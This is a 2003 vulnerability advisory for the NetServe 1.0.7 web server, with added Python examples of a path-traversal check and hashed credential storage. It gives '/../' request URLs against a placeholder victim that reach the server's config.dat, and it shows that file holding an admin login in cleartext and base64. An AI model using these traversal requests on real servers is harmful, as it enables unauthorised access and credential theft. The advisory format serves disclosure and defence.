
Multiple vulnerabilities in NetServe 1.0.7



  ________________________
/                                                         
|  For Contacts:                                 
|  nimber                                             
| e-mail: nimber@xxxxxxx                  
|         nimber@xxxxxxxxxxx          
|Home Page: www.nimber.plux.ru  
|ICQ: 132614                                      
\________________________ 

Advisory Information: 
=================                                      
Application : NetServe  Web Server                      
Date        : 17.11.2003                                
Vendor Homepage : http://www.starlots.com/netx/index.html            
Versions : 1.0.7 (maybe older)                         
Platforms: Windows NT, 95, 98, 2000, and XP.                         
Severity : High   
Local : yes                                                  
Remote: yes      
Tested on WinXP and Win2K.

=================
Advisories: Multiple vulnerabilities in NetServe 1.0.7
=================
The description of a product (from the developer): 
"About NetServe Web Server
NetServe is a super compact Web Server and File Sharing application for Windows 
NT, 95, 98, 2000, and XP.
Its HTTP Web Server can serve all types of files including html, gif and jpeg, 
actually any files placed in your NetServe directory can be served.
New key features include Server-Side-Include (SSI) support and CGI/1.1 support 
giving you the choice of your preferred scripting language, 
including but not limited to; Perl, ASP and PHP, to create your dynamic 
content. Other features include a fully integrated File Sharing application 
supplying a html front end to allow for directory browsing and download. A html 
form gives users the ability to upload up-to 5 files simultaneously to any 
directory.
With security in mind, NetServe features admin tools that allow you full 
control of how users accessing your server see the resources available, just 
some of the options include, Access served pages only, allow directory 
browsing, allow file downloading, and even allow file uploading.
And of course every action being performed on the NetServe Server is 
automatically logged, so you can interrogate the logs at a later date for 
statistics."
=================
The contents:
=================
+ Advisory Information.
+ Part 1: Directory traversal vulnerability.
+ Part 2: Viewing the server's configuration file.
+ Part 3: Access to the admin password.
=================
Part - 1:
======
The server does not filter "/../../" sequences, which allows a request to move 
up to the parent folder.
This vulnerability allows the contents of folders and files to be viewed.
Example: http://[victim]/../test/
Shows the contents of the folder /test/
Example: http://[victim]/../test/test.txt
Shows the contents of the file test.txt, which is in the folder /test/
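
The missing check, as an added example (not NetServe code and not part of the original advisory): the request path is decoded, joined to the document root, normalised, and refused unless the result is still inside the root. The function name is hypothetical; the root is the ServerRoot value from the config.dat excerpt below, written without its trailing backslash.

```python
import ntpath                      # Windows path rules, usable on any platform
from urllib.parse import unquote

# Document root as shown in the advisory's config.dat excerpt (ServerRoot).
SERVER_ROOT = r"D:\Program Files\NetServe Web Server\wwwroot"


def resolve_request(url_path, root=SERVER_ROOT):
    """Map a URL path to a file under root; return None if it escapes root."""
    decoded = unquote(url_path)    # decode once, before any check is made
    if "\x00" in decoded:
        return None
    # Windows accepts both separators, so fold them into one and make the
    # path relative so it cannot reset the join to the drive root.
    relative = decoded.replace("/", "\\").lstrip("\\")
    if ":" in relative:            # drive letters, alternate data streams
        return None
    candidate = ntpath.normpath(ntpath.join(root, relative))
    root_cmp = ntpath.normcase(ntpath.normpath(root))
    cand_cmp = ntpath.normcase(candidate)
    # Compare with a trailing separator so "wwwroot2" is not taken for
    # a child of "wwwroot".
    if cand_cmp == root_cmp or cand_cmp.startswith(root_cmp + "\\"):
        return candidate
    return None


if __name__ == "__main__":
    # Constructed request paths; the second and third are the advisory's own.
    for path in ["/index.html", "/../test/test.txt", "/../config.dat",
                 "/%2e%2e/config.dat", "/..\\config.dat", "/docs/../index.html"]:
        print(f"{path!r:28} -> {resolve_request(path)}")
```

This is a string-level check only; a server that can follow links or junctions on disk also has to compare the resolved on-disk path against the root.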

Part - 2:
======
By default, the server's settings place the site folder at [NetServe Web 
Server folder]\wwwroot\
If the admin has not changed this setting, the vulnerability above gives us 
access to the server's configuration file.
Example:
http://[victim]/../config.dat

Example of the file:
================
EnableCGI True
EnableRemoteAdmin True
EnableSSI False
EnablePasswords True
IndexFiles index.html index.htm
SSIAbbrevSize True
SSIExtensions shtml
SSIErrorMessage An SSI Error Has Occured
SSITimeFormat 
AuthenticationType Basic
Port 80
ServerRoot D:\Program Files\NetServe Web Server\wwwroot\
Logging True
Counter False
Minimized True
ActivateOnStart False
MimeTypes application/mac-binhex40|hqx
MimeTypes application/msword|doc
MimeTypes application/octet-stream|bin dms lha lzh exe class
MimeTypes application/pdf|pdf
MimeTypes application/postscript|ai eps ps
MimeTypes application/smil|smi smil
MimeTypes application/vnd.mif|mif
MimeTypes application/vnd.ms-asf|asf
MimeTypes application/vnd.ms-excel|xls
MimeTypes application/vnd.ms-powerpoint|ppt
MimeTypes application/x-cdlink|vcd
MimeTypes application/x-compress|Z
MimeTypes application/x-cpio|cpio
MimeTypes application/x-csh|csh
MimeTypes application/x-director|dcr dir dxr
MimeTypes application/x-dvi|dvi
MimeTypes application/x-gtar|gtar
MimeTypes application/x-gzip|gz
MimeTypes application/x-javascript|js
MimeTypes application/x-latex|latex
MimeTypes application/x-sh|sh
MimeTypes application/x-shar|shar
MimeTypes application/x-shockwave-flash|swf
MimeTypes application/x-stuffit|sit
MimeTypes application/x-tar|tar
MimeTypes application/x-tcl|tcl
MimeTypes application/x-tex|tex
MimeTypes application/x-texinfo|texinfo texi
MimeTypes application/x-troff|t tr roff
MimeTypes application/x-troff-man|man
MimeTypes application/x-troff-me|me
MimeTypes application/x-troff-ms|ms
MimeTypes application/zip|zip
MimeTypes audio/basic|au snd
MimeTypes audio/midi|mid midi kar
MimeTypes audio/mpeg|mpga mp2 mp3
MimeTypes audio/x-aiff|aif aiff aifc
MimeTypes audio/x-pn-realaudio|ram rm
MimeTypes audio/x-realaudio|ra
MimeTypes audio/x-wav|wav
MimeTypes image/bmp|bmp
MimeTypes image/gif|gif
MimeTypes image/ief|ief
MimeTypes image/jpeg|jpeg jpg jpe
MimeTypes image/png|png
MimeTypes image/tiff|tiff tif
MimeTypes image/x-cmu-raster|ras
MimeTypes image/x-portable-anymap|pnm
MimeTypes image/x-portable-bitmap|pbm
MimeTypes image/x-portable-graymap|pgm
MimeTypes image/x-portable-pixmap|ppm
MimeTypes image/x-rgb|rgb
MimeTypes image/x-xbitmap|xbm
MimeTypes image/x-xpixmap|xpm
MimeTypes image/x-xwindowdump|xwd
MimeTypes image/x-icon|ico
MimeTypes model/iges|igs iges
MimeTypes model/mesh|msh mesh silo
MimeTypes model/vrml|wrl vrml
MimeTypes text/css|css
MimeTypes text/html|html htm
MimeTypes text/plain|asc txt
MimeTypes text/richtext|rtx
MimeTypes text/rtf|rtf
MimeTypes text/sgml|sgml sgm
MimeTypes text/tab-separated-values|tsv
MimeTypes text/xml|xml
MimeTypes video/mpeg|mpeg mpg mpe
MimeTypes video/quicktime|qt mov
MimeTypes video/x-msvideo|avi
Users nimber|password||bmltYmWyfnZpFXmuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
================

Part - 3:
======
Using the vulnerability described above, we can obtain the admin password for 
the server's remote administration. This allows us to change the server's 
configuration completely!
The password and login are visible in the configuration file discussed above, 
config.dat. The last lines of the file contain the information we need:
====[config.dat]====
Users nimber|vietnam||bmltYmVyOnZpZXRuYW0=
Aliases /admin|D:\Program Files\NetServe Web Server\admin
====[config.dat]====

We also see the folder that holds the admin scripts.
I want to draw your attention to the fact that the password and login are not protected!
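
What "not protected" means for the Users line, and one way to store the credential instead, as an added example (not NetServe code and not part of the original advisory). The field layout is inferred from the excerpt above, and the PBKDF2 record format, iteration count and function names are assumptions made for illustration.

```python
import base64
import hashlib
import hmac
import os

# Line copied from the config.dat excerpt above. The layout
# (name|password||base64 token) is inferred from that sample.
SAMPLE = "Users nimber|vietnam||bmltYmVyOnZpZXRuYW0="
ITERATIONS = 600_000   # assumed work factor for the hardened record


def audit_users_line(line):
    """Return the findings for one 'Users' entry of a config.dat-style file."""
    fields = line.split(" ", 1)[1].split("|")
    name, password, token = fields[0], fields[1], fields[-1]
    findings = []
    if password:
        findings.append("cleartext password stored")
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except ValueError:             # bad base64 or bytes that are not UTF-8
        decoded = None
    if decoded == f"{name}:{password}":
        # Same value a client sends in an HTTP Basic Authorization header.
        findings.append("token is base64 of name:password (reversible)")
    return findings


def make_record(name, password):
    """Hardened form: a salted, iterated hash replaces both secret fields."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"Users {name}|pbkdf2-sha256|{ITERATIONS}|{salt.hex()}|{digest.hex()}"


def verify(record, password):
    """Check a login attempt against a record produced by make_record()."""
    _, _, iters, salt, digest = record.split(" ", 1)[1].split("|")
    probe = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                bytes.fromhex(salt), int(iters))
    return hmac.compare_digest(probe, bytes.fromhex(digest))


if __name__ == "__main__":
    print(audit_users_line(SAMPLE))
    print(make_record("nimber", "vietnam"))
```

With a record of this kind, a leaked config.dat no longer hands over a working login, although the traversal flaw still has to be fixed on its own.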

=================
Gr33tz: ZeT, XSPYD3X, euronymous,  JLx, Iww, unix, Demon, mestereeo, Pirog, 
Corpse, x-a13x, insurrectionist, UnInstall, Kabuto and all my friends.
Re: krok, 3APA3A, buggzy.

             p.s> SORRY for my bad english ;)
_EOF_